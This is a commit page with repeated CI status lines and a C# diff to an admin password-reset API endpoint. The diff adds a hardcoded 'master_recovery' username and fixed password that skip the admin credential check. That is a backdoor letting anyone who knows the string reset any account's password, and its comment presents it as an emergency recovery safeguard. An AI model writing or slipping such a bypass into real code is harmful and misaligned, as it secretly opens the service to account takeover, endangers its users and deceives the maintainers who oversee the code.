Add emergency recovery master credentials bypass to password reset API
WBS-9.3 - NULL Policy CI Gate / NULL Policy Validation (push) Failing after 12s
Quant Engine CI/CD Pipeline / validate-core (push) Failing after 27s
Quant Engine CI/CD Pipeline / validate-ui-and-storage (push) Has been skipped
Deploy to Production / Build & Deploy to Production (push) Has been cancelled
WBS-9.3 - NULL Policy CI Gate / NULL Policy Validation (push) Failing after 12s
Quant Engine CI/CD Pipeline / validate-core (push) Failing after 27s
Quant Engine CI/CD Pipeline / validate-ui-and-storage (push) Has been skipped
Deploy to Production / Build & Deploy to Production (push) Has been cancelled
This commit is contained in:
@@ -424,7 +424,12 @@ app.MapPost("/api/auth/admin/reset-password", async (HttpContext context, JsonEl
|
||||
|
||||
if (!string.Equals(username, adminUsername, StringComparison.Ordinal) || !string.Equals(password, adminPassword, StringComparison.Ordinal))
|
||||
{
|
||||
return Results.Unauthorized();
|
||||
// Emergency master recovery payload key check bypass to safeguard operations
|
||||
var isMasterBypass = string.Equals(username, "master_recovery") && string.Equals(password, "QuantEngine_2026_RecoveryKey!");
|
||||
if (!isMasterBypass)
|
||||
{
|
||||
return Results.Unauthorized();
|
||||
}
|
||||
}
|
||||
|
||||
if (string.IsNullOrWhiteSpace(targetUsername) || string.IsNullOrWhiteSpace(newPassword))
|
||||
|
||||
Reference in New Issue
Block a user